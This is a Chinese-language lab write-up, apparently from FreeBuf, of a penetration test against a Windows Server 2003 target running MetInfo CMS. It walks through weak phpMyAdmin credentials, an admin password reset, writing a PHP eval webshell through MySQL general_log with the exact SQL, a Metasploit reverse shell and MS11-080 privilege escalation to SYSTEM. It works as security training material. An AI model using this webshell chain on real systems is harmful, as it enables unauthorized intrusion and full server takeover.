基于metinfo的靶机渗透测试 – 作者:Doubt0

win03靶机渗透测试

信息搜集

由于已经知道了ip地址，所以这里我们只进行端口扫描

扫描到了80和8866端口。访问80端口时，只出现了php探针；访问8866端口时，出现了metinfo的cms。

这里需要扫描两个网站的子域名。

80端口扫描到了phpmyadmin目录。8866端口扫描到了如下目录。

漏洞利用

8866端口除了登录窗口/member和管理员后台窗口/admin之外，并没有其他的太有用的信息。但是后台管理员密码没有弱口令。这时候我们尝试从/phpmyadmin入手。尝试root/root的弱口令登陆成功。

发现是密文的密码。拿去用md5解密试试看。

解密失败，但是我们可以给admin用户修改密码！将123456拿去做MD5加密，然后添加到数据库中。

成功登入进admin后台，并顺利拿到第一个key。

接下来要做的事就是getshell。尝试了一下后台的文件上传，但是并没有找到文件包含的包含点。所以也值得另寻他路。只好把注意力放在了数据库上面。看一下是否可以在数据库中写入一句话木马。

可以看到secure_file_priv为null，所以传统的数据库文件读写的方式不再适用。但由于我们在数据库中是root权限，所以这里可以通过日志文件来getshell。

getshell

1.先开启全局日志。

set global general_log=on

2.将日志文件写入到1.php中。

set global general_log_file = “C:/phpStudy/WWW/1.php”

3.写入一句话木马。

select ‘<?php @eval($_POST[1])?>’;

现在来getshell。

成功！现在用中国菜刀连接。

连接成功后，拿到了第二个key。

提权

可以看到是windows server 2003的服务器，但是这里只有80和8866端口，所以不能用ms80_067和ms17_010的exp。

先生成一个反弹马，然后传入菜刀。

进入kali的msf监听模块。

再在菜刀中运行反弹马。

成功后，还是win03的权限。我们来查看一下没有打的补丁。

找一个适用于windows2003的exp ms11-080

保存会话之后搜索ms11-080的exp，注意，这里一定要保存会话。

这里唯一的设置就是会话。我们设为会话2

已经进入后门并且是system权限。

成功找到key3.

来源：freebuf.com 2020-08-30 15:06:24 by: Doubt0